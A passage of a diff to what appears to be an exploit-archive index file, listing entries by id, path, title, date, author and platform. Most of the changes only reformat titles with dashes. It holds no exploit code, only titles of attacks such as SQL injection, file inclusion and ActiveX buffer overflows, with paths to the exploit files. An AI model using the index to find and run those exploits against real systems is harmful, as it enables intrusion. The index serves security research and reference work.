Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29820,platforms/multiple/remote/29820.html,"Firebug 1.03 Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 +29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - Index.php Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29823,platforms/php/dos/29823.c,"PHP 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0 @@ -26929,7 +26929,7 @@ id,file,description,date,author,platform,type,port 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 - Login.php HTML Injection",2007-04-09,"John Martinelli",php,webapps,0 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.php Cross-Site Scripting",2007-04-10,hackberry,php,webapps,0 29830,platforms/php/webapps/29830.txt,"MyNews 4.2.2 Week_Events.php Remote File Inclusion",2007-04-10,hackberry,php,webapps,0 -29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 +29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 newaccount2.php - Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 @@ -26939,9 +26939,9 @@ id,file,description,date,author,platform,type,port 29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x - /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - Admin/Index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0 -29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 +29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 -29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 +29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0 29845,platforms/php/webapps/29845.txt,"phpwebnews 0.1 iklan.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 29846,platforms/php/webapps/29846.txt,"phpwebnews 0.1 - index.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 29847,platforms/php/webapps/29847.txt,"phpwebnews 0.1 bukutamu.php m_txt Parameter XSS",2007-04-07,the_Edit0r,php,webapps,0 @@ -26961,7 +26961,7 @@ id,file,description,date,author,platform,type,port 29862,platforms/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe Footer.php Local File Inclusion",2007-04-16,BeyazKurt,php,webapps,0 29863,platforms/php/webapps/29863.txt,"Actionpoll 1.1 - Actionpoll.php Remote File Inclusion",2007-04-16,SekoMirza,php,webapps,0 29864,platforms/php/webapps/29864.php,"MyBlog 0.9.8 Settings.php Authentication Bypass",2007-04-16,BlackHawk,php,webapps,0 -29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 +29865,platforms/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - Showpic.php Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps,0 29866,platforms/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injection",2007-04-17,Aleksandar,php,webapps,0 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection",2007-04-18,"John Martinelli",php,webapps,0 @@ -26980,7 +26980,7 @@ id,file,description,date,author,platform,type,port 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR/DEP Bypass Exploit with SANDBOX BYPASS",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 Article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 -29884,platforms/multiple/remote/29884.txt,"Apple Quicktime 7.1.5 QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 +29884,platforms/multiple/remote/29884.txt,"Apple Quicktime 7.1.5 QTJava toQTPointer() Java Handling - Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 29885,platforms/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29886,platforms/php/webapps/29886.txt,"Lms 1.5.x - RTMessageAdd.php Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 29887,platforms/php/webapps/29887.txt,"Phorum 5.1.20 - admin.php Groups Module group_id Parameter XSS",2007-04-23,"Janek Vind",php,webapps,0 @@ -26992,7 +26992,7 @@ id,file,description,date,author,platform,type,port 29893,platforms/php/webapps/29893.txt,"Phorum 5.1.20 - admin.php badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29894,platforms/php/webapps/29894.txt,"Phorum 5.1.20 - admin.php Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps,0 29895,platforms/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps,0 -29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing Malformed BMP File Denial of Service",2007-04-24,Dr.Ninux,windows,dos,0 +29896,platforms/windows/dos/29896.c,"Cdelia Software ImageProcessing - Malformed BMP File Denial of Service",2007-04-24,Dr.Ninux,windows,dos,0 29897,platforms/windows/remote/29897.txt,"Progress 3.1 Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote,0 29898,platforms/php/webapps/29898.txt,"plesk 8.1.1 - login.php3 Directory Traversal",2007-04-25,anonymous,php,webapps,0 29899,platforms/php/webapps/29899.txt,"MyNewsGroups 0.6 Include.php Remote File Inclusion",2007-04-25,"Ali and Saeid",php,webapps,0 @@ -27000,7 +27000,7 @@ id,file,description,date,author,platform,type,port 29901,platforms/multiple/dos/29901.txt,"Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)",2007-03-21,"Barrie Dempster",multiple,dos,0 29902,platforms/php/webapps/29902.txt,"PHPMyTGP 1.4 AddVIP.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 29903,platforms/php/webapps/29903.txt,"Ahhp Portal - Page.php Multiple Remote File Inclusion",2007-04-25,CodeXpLoder'tq,php,webapps,0 -29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 +29904,platforms/php/webapps/29904.txt,"CafeLog B2 0.6.1 - Weblog and News Publishing Tool b2archives.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2categories.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool b2mail.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29907,platforms/php/webapps/29907.txt,"Comus 2.0 - Accept.php Remote File Inclusion",2007-04-25,alijsb,php,webapps,0 @@ -27109,7 +27109,7 @@ id,file,description,date,author,platform,type,port 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injection",2007-05-21,"Jesper Jurcenoks",php,webapps,0 30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",windows,remote,0 30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0 -30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 DartZipLite.DLL ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 +30069,platforms/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - DartZipLite.DLL ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote,0 30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - Index.php HTML Injection",2007-05-22,"John Martinelli",php,webapps,0 30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0 30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0 @@ -27139,7 +27139,7 @@ id,file,description,date,author,platform,type,port 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30104,platforms/windows/dos/30104.nasl,"F-Secure Policy Manager 7.00 - FSMSH.DLL Remote Denial of Service",2007-05-30,"David Maciejak",windows,dos,0 -30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service",2007-06-16,Lostmon,windows,dos,0 +30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows - Corefoundation.DLL Denial of Service",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service",2007-06-16,azizov,windows,dos,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,Metasploit,windows,remote,8080 30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 @@ -27183,7 +27183,7 @@ id,file,description,date,author,platform,type,port 30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote,0 -30257,platforms/windows/remote/30257.html,"HP Instant Support ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 +30257,platforms/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 30258,platforms/php/webapps/30258.txt,"LightBlog 5 Add_Comment.php Cross-Site Scripting",2007-07-02,Serapis.net,php,webapps,0 30259,platforms/php/webapps/30259.txt,"Claroline 1.8.3 - $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",cgi,webapps,0 @@ -27205,7 +27205,7 @@ id,file,description,date,author,platform,type,port 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - Login.php Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x - Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 PARAms Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 -30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 +30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local - Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 @@ -27250,20 +27250,20 @@ id,file,description,date,author,platform,type,port 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - index.php current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 Blog Anonymous Blog Entry XSS",2007-07-17,joseph.giron13,php,webapps,0 30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 -30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote - Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote - Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 -30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 -30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti Index.ASP SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 +30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 +30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - Index.ASP SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent XSS",2013-12-16,hellok,php,webapps,0 -30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti Index.ASP Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 +30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - Index.ASP Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer SearchResults.ASP SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0 -30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 W1L3D4_Aramasonuc.ASP Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 +30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 - W1L3D4_Aramasonuc.ASP Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 @@ -27297,7 +27297,7 @@ id,file,description,date,author,platform,type,port 30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - Login.ASP Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 -30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow",2007-07-27,Unknown,windows,remote,0 +30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 - YDPCTL.DLL ActiveX Control Buffer Overflow",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0 @@ -27322,7 +27322,7 @@ id,file,description,date,author,platform,type,port 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 -30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 BaiduBar.DLL ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 +30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - BaiduBar.DLL ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 lang-en.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 menu-ed.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27330,7 +27330,7 @@ id,file,description,date,author,platform,type,port 30436,platforms/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - index.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 vote.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 -30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote,0 +30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 Webevent.CGI Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector Index.php Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 @@ -27381,13 +27381,13 @@ id,file,description,date,author,platform,type,port 30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - Index.php Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (phpAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 -30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 +30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - TBLinf32.DLL ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger Filter Bypass Weakness",2007-08-13,"Meder Kydyraliev",multiple,remote,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - Index.php SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 -30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 -30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 -30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 +30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 - Vector Markup Language VGX.DLL Remote Buffer Overflow",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 +30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 +30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 30497,platforms/multiple/dos/30497.c,"Zoidcom 0.6.x - Malformed Packet Denial of Service",2007-08-14,"Luigi Auriemma",multiple,dos,0 30498,platforms/multiple/dos/30498.txt,"Live For Speed S1/S2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,dos,0 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0 @@ -27462,19 +27462,19 @@ id,file,description,date,author,platform,type,port 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting",2007-11-10,"Remco Verhoef",hardware,remote,0 -30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 -30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 -30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 Cal2.JSP Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 +30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 - bdelev.dll ActiveX Control Double Free",2007-11-11,"Lionel d'Hauenens",windows,remote,0 +30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 +30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - Cal2.JSP Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - Login.ASP SQL Injection",2007-09-04,SmOk3,asp,webapps,0 -30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 +30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 - Heap-Based Buffer Overflow",2007-09-04,miyy3t,windows,remote,0 30566,platforms/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos,0 -30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 +30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control - Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",windows,remote,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - Index.php Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 30569,platforms/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote,0 30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 Header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 30572,platforms/php/webapps/30572.txt,"phpMyQuote 0.20 - Index.php SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 -30573,platforms/php/webapps/30573.txt,"SisfoKampus dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 +30573,platforms/php/webapps/30573.txt,"SisfoKampus dwoprn.php - Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 text_search_action.php search_string Parameter XSS",2007-09-12,Doz,php,webapps,0 @@ -27494,7 +27494,7 @@ id,file,description,date,author,platform,type,port 32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting",2008-09-20,"Rohit Bansal",php,webapps,0 32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS - 'tienda.php' SQL Injection",2008-09-21,r45c4l,php,webapps,0 32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session 